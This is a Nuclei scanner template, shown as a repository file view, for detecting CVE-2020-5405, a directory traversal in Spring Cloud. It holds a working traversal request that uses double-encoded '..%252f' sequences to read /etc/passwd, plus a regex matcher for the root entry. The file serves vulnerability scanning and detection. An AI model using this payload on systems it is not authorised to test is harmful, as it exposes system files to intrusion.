nuclei-templates/cves/2020/CVE-2020-5405.yaml

23 lines
514 B
YAML

id: CVE-2020-5405
info:
name: Spring Cloud Directory Traversal
author: Harsh Bothra
severity: high
reference: https://nvd.nist.gov/vuln/detail/CVE-2020-5405
tags: cve,cve2020,traversal,springcloud
requests:
- method: GET
path:
- '{{BaseURL}}/a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0:"
part: body